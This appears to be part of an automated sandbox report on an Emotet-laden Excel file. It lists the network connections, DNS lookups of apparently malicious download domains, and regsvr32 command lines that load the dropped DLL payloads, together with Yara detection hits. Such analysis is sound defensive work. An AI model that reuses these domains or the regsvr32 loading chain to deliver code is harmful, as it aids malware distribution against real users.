                            Nov 15, 2022 12:43:50.384752989 CET | 49176 | 80 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.502834082 CET | 80 | 49176 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.502966881 CET | 49176 | 80 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.526437998 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.526488066 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.526627064 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.527003050 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.527031898 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.807878017 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.808072090 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.834065914 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.834100962 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.834559917 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.834657907 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.845236063 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.845251083 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.978935957 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.979039907 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.979135036 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.979163885 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.997932911 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.997978926 CET | 443 | 49177 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.997992039 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.998038054 CET | 49177 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.998893976 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.998948097 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:50.999017000 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.999226093 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:50.999237061 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:51.058146000 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:51.058315039 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:51.065999985 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:51.066024065 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:51.069143057 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:51.069154978 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:51.599956989 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:51.600119114 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:51.600148916 CET | 443 | 49178 | 163.172.108.69 | 192.168.2.22
                            Nov 15, 2022 12:43:51.600219011 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:51.669475079 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:51.669512987 CET | 49178 | 443 | 192.168.2.22 | 163.172.108.69
                            Nov 15, 2022 12:43:52.393383980 CET | 49179 | 80 | 192.168.2.22 | 47.92.133.65
                            Nov 15, 2022 12:43:52.624022007 CET | 80 | 49179 | 47.92.133.65 | 192.168.2.22
                            Nov 15, 2022 12:43:52.624263048 CET | 49179 | 80 | 192.168.2.22 | 47.92.133.65
                            Nov 15, 2022 12:43:52.624563932 CET | 49179 | 80 | 192.168.2.22 | 47.92.133.65
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Nov 15, 2022 12:43:46.305713892 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
                            Nov 15, 2022 12:43:46.416620970 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
                            Nov 15, 2022 12:43:46.418853045 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255
                            Nov 15, 2022 12:43:47.181888103 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255
                            Nov 15, 2022 12:43:47.946404934 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255
                            Nov 15, 2022 12:43:48.869680882 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8
                            Nov 15, 2022 12:43:48.887279987 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22
                            Nov 15, 2022 12:43:50.331979990 CET | 58836 | 53 | 192.168.2.22 | 8.8.8.8
                            Nov 15, 2022 12:43:50.349412918 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.22
                            Nov 15, 2022 12:43:52.092000008 CET | 50134 | 53 | 192.168.2.22 | 8.8.8.8
                            Nov 15, 2022 12:43:52.392379045 CET | 53 | 50134 | 8.8.8.8 | 192.168.2.22
                            Nov 15, 2022 12:44:11.827030897 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255
                            Nov 15, 2022 12:45:41.442714930 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Nov 15, 2022 12:43:46.305713892 CET | 192.168.2.22 | 8.8.8.8 | 0x6626 | Standard query (0) | sat7ate.com | A (IP address) | IN (0x0001) | false
                            Nov 15, 2022 12:43:48.869680882 CET | 192.168.2.22 | 8.8.8.8 | 0x2474 | Standard query (0) | www.spinbalence.com | A (IP address) | IN (0x0001) | false
                            Nov 15, 2022 12:43:50.331979990 CET | 192.168.2.22 | 8.8.8.8 | 0x72a1 | Standard query (0) | www.3d-stickers.com | A (IP address) | IN (0x0001) | false
                            Nov 15, 2022 12:43:52.092000008 CET | 192.168.2.22 | 8.8.8.8 | 0xe22e | Standard query (0) | navylin.com | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Nov 15, 2022 12:43:46.416620970 CET | 8.8.8.8 | 192.168.2.22 | 0x6626 | Server failure (2) | sat7ate.com | none | none | A (IP address) | IN (0x0001) | false
                            Nov 15, 2022 12:43:48.887279987 CET | 8.8.8.8 | 192.168.2.22 | 0x2474 | No error (0) | www.spinbalence.com | | 163.172.115.127 | A (IP address) | IN (0x0001) | false
                            Nov 15, 2022 12:43:50.349412918 CET | 8.8.8.8 | 192.168.2.22 | 0x72a1 | No error (0) | www.3d-stickers.com | | 163.172.108.69 | A (IP address) | IN (0x0001) | false
                            Nov 15, 2022 12:43:52.392379045 CET | 8.8.8.8 | 192.168.2.22 | 0xe22e | No error (0) | navylin.com | | 47.92.133.65 | A (IP address) | IN (0x0001) | false
                            • www.spinbalence.com
                            • www.3d-stickers.com
                            • 218.38.121.17
                            • navylin.com

                            Target ID:0
                            Start time:12:43:16
                            Start date:15/11/2022
                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Imagebase:0x13fe10000
                            File size:28253536 bytes
                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:12:43:27
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv1.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:6
                            Start time:12:43:28
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv2.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:7
                            Start time:12:43:30
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv3.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:8
                            Start time:12:43:33
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\regsvr32.exe ..\oxnv4.ooccxx
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:9
                            Start time:12:43:36
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000009.00000002.1211620382.000000000021A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1212856230.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            Target ID:10
                            Start time:12:44:28
                            Start date:15/11/2022
                            Path:C:\Windows\System32\regsvr32.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\XXKTOC\CASBb.dll
                            Imagebase:0xff9c0000
                            File size:19456 bytes
                            MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1211836015.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:high

                            No disassembly